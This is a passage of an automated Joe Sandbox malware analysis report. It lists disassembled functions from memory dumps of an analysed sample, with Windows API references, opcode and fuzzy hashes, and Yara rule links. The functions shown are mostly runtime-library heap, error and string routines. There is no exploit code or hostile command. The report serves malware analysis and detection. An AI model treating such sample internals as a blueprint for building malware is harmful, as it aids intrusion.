                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 336800556-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 185d1ed9ecef8144133741e770c7f690cc73314bd8b35b651e92b3f6daef2f2c
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 59e168f4f6e7af8cf3df2d45ef85047e89952db11e0f1392821123788606edfe
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 185d1ed9ecef8144133741e770c7f690cc73314bd8b35b651e92b3f6daef2f2c
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 770188BFA066157B23231ABA5C48D7FAA6DDAC6E643140529BD04C7248EB70CC0185F5
                                                                                                                                                                                                                                                                                                                              Function 10019622 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 1001962B
                                                                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001964E
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10015A9F: RtlAllocateHeap.NTDLL(00000000,1000A5B7,?), ref: 10015AD1
                                                                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 10019674
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 10019687
                                                                                                                                                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 10019696
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 336800556-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: cd0ed9cec5a439b2b5836332e9c626755adc875954e91f3a7efe53195477cde9
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 6d2579429703740ef37404fee318dbdf00b11e5c7429adf95d1d5b6a0b07cec0
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd0ed9cec5a439b2b5836332e9c626755adc875954e91f3a7efe53195477cde9
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B001A272601725BF671296B65CCCC7F7AADDFC6EA5326022DFE04CA245DA71CD4281B0
                                                                                                                                                                                                                                                                                                                              Function 02835B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000000,0283636D,02835713,00000000,?,02832249,?,?,02831D66,00000000,?,?,00000000), ref: 02835B7F
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02835BB4
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02835BDB
                                                                                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 02835BE8
                                                                                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 02835BF1
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 8f347bdefafd935c14de02ebd0ff7b1bcb651fa90aade00b7e0937be85a49dd4
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 99bd6dbc0d23379f6009241f0dae46c79a69e9ee5168bfb21b4d9c175884e886
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f347bdefafd935c14de02ebd0ff7b1bcb651fa90aade00b7e0937be85a49dd4
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FB012DBE545601A79713763C2C84EAF266E9BCDA747E00914F81AD7180EF7CC80185E5
                                                                                                                                                                                                                                                                                                                              Function 10016B00 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(1000A5B7,1000A5B7,?,100160F1,10015AE2,?,?,1000C7AC,?,?,?,?,?,1000A4CA,1000A5B7,?), ref: 10016B05
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 10016B3A
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 10016B61
                                                                                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,1000A5B7), ref: 10016B6E
                                                                                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,1000A5B7), ref: 10016B77
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 5c84e16c2a66fa28b03aad63272ec2f76a486bc5c072b97fff44e3eae95c9b85
                                                                                                                                                                                                                                                                                                                              • Instruction ID: ac220c7f5632b09d9213959bcab330a47a9ba60472251cba742aca4957c4ce2f
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c84e16c2a66fa28b03aad63272ec2f76a486bc5c072b97fff44e3eae95c9b85
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6701D13A648611A6D216D6744CC6E4B32A9EBC97A13794128FA19DE182FF31CCD25061
                                                                                                                                                                                                                                                                                                                              Function 0041B38D Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                                                                                                                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                                                                                                                                                                                                                                                                                                                              • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041B3D8
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3E3
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3EB
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Process$CloseHandleOpen$FileImageName
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 2951400881-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: ce5486b1f796499b88157f01d5bcfd41214e425df4fcbc0a0cf489e7c63b94f0
                                                                                                                                                                                                                                                                                                                              • Instruction ID: d8943217945b3e3bc9c1dbf33fc4ac7f726da2cd485b5cd5dbfa96192dfeb6c9
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce5486b1f796499b88157f01d5bcfd41214e425df4fcbc0a0cf489e7c63b94f0
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 67F04971204209ABD3026794AC4AFEBB26CDF44B96F000037FA11D22A2FF74CCC146A9
                                                                                                                                                                                                                                                                                                                              Function 02831E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,028310DF,?,?,?,00000000), ref: 02831E9A
                                                                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(?,?,?,028310DF,?,?,?,00000000), ref: 02831EAC
                                                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,028310DF,?,?,?,00000000), ref: 02831EB3
                                                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,028310DF,?,?,?,00000000), ref: 02831EC8
                                                                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(?,028310DF,?,028310DF,?,?,?,00000000), ref: 02831ED3
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: lstrlen$lstrcat
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 493641738-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: aee7593d19bb22d1c699c7e553435ad0309b6084de486b1e63643aa47f675f8b
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 73376c55d2c24ea2198ab7228d6246ab143883400acf81de612aef5ff8f474d8
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aee7593d19bb22d1c699c7e553435ad0309b6084de486b1e63643aa47f675f8b
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 85F0892E5401107AD6223729AC85E7F777CEFC5F60B040419F90CC3190DBA5585296F5
                                                                                                                                                                                                                                                                                                                              Function 0044F7AD Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044F7C5
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044F7D7
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044F7E9
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044F7FB
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044F80D
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 070623068f58a673a03bb4c9f7ddd8597c716d05cca38f31fa25b5a97b2bc473
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CBF01232505610ABA620EB59F9C1C1773EAEA427247A5882BF048F7A41C77DFCC0866C
                                                                                                                                                                                                                                                                                                                              Function 028391B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 028391D0
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0283571E: HeapFree.KERNEL32(00000000,00000000,?,0283924F,?,00000000,?,00000000,?,02839276,?,00000007,?,?,02837E5A,?), ref: 02835734
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0283571E: GetLastError.KERNEL32(?,?,0283924F,?,00000000,?,00000000,?,02839276,?,00000007,?,?,02837E5A,?,?), ref: 02835746
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 028391E2
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 028391F4
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02839206
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02839218
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: a29d8fd231ee54ae4b684a98b32803df25dc5ecb20f9511891244b6182141d90
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 502baa8ff46667ea54ef4f04da4814033c38f3f0b2ae27e78e1195ecf13d5ac8
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a29d8fd231ee54ae4b684a98b32803df25dc5ecb20f9511891244b6182141d90
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 13F0627E964640E78632EB58E5C4C1A7BEAFA047183B40C45F84DD7540DB78F890CAD0
                                                                                                                                                                                                                                                                                                                              Function 1001CC95 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001CCAD
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10015A65: RtlFreeHeap.NTDLL(00000000,00000000,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?), ref: 10015A7B
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10015A65: GetLastError.KERNEL32(?,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?,?), ref: 10015A8D
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001CCBF
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001CCD1
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001CCE3
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001CCF5
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: b160ac3c7e6a73b26172b0e2cb07627f629462614d6fd128c956020dad7da9d3
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 705fac4b2ef0ed0d18e498dac5b3377924e7d1501aba8971cd3dfab6f4dcb135
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b160ac3c7e6a73b26172b0e2cb07627f629462614d6fd128c956020dad7da9d3
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1DF06D31408A189BC640CB68E9C2C1A33F9EF88B917AC4809F48DDF500CB31FDC28AA4
                                                                                                                                                                                                                                                                                                                              Function 02835351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0283536F
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0283571E: HeapFree.KERNEL32(00000000,00000000,?,0283924F,?,00000000,?,00000000,?,02839276,?,00000007,?,?,02837E5A,?), ref: 02835734
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0283571E: GetLastError.KERNEL32(?,?,0283924F,?,00000000,?,00000000,?,02839276,?,00000007,?,?,02837E5A,?,?), ref: 02835746
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02835381
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02835394
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 028353A5
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 028353B6
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: ad5328e122a0cc4dd3bccbeff387f55412891bbffd1e0e1c48362ef206eb3e89
                                                                                                                                                                                                                                                                                                                              • Instruction ID: cb825a046e8dc5a326cc9cf13627d0e445c18310d06b0c973df9534c402e714d
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ad5328e122a0cc4dd3bccbeff387f55412891bbffd1e0e1c48362ef206eb3e89
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14F0547CCA4614DB86166F28B5414083BF6B71DB143650E86F814D32D0DB390521CFC1
                                                                                                                                                                                                                                                                                                                              Function 10015867 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 10015885
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10015A65: RtlFreeHeap.NTDLL(00000000,00000000,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?), ref: 10015A7B
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10015A65: GetLastError.KERNEL32(?,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?,?), ref: 10015A8D
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 10015897
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 100158AA
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 100158BB
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 100158CC
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 207940b51d209e858706144c0a969e265abd99e345c3376a56f28a2680fc7459
                                                                                                                                                                                                                                                                                                                              • Instruction ID: ce460e5bac6ae8aad040ed738a165eee73e0f07a81d148bf5aaa982fd25e43d9
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 207940b51d209e858706144c0a969e265abd99e345c3376a56f28a2680fc7459
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ADF03074844A35DBE601EF549CC1C1537A0FB487113BD4A4AF4506E271C732A6838F82
                                                                                                                                                                                                                                                                                                                              Function 10005600 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 405COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
